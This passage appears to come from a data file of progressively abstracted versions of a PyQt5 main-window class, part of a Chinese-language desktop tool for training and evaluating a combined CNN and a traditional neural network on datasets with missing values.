QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif 
self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n 
trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n 
self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n 
self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = 
QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n <function token>\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<code token>\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n 
trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n 
self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n <function 
token>\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n <function token>\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n <function token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n 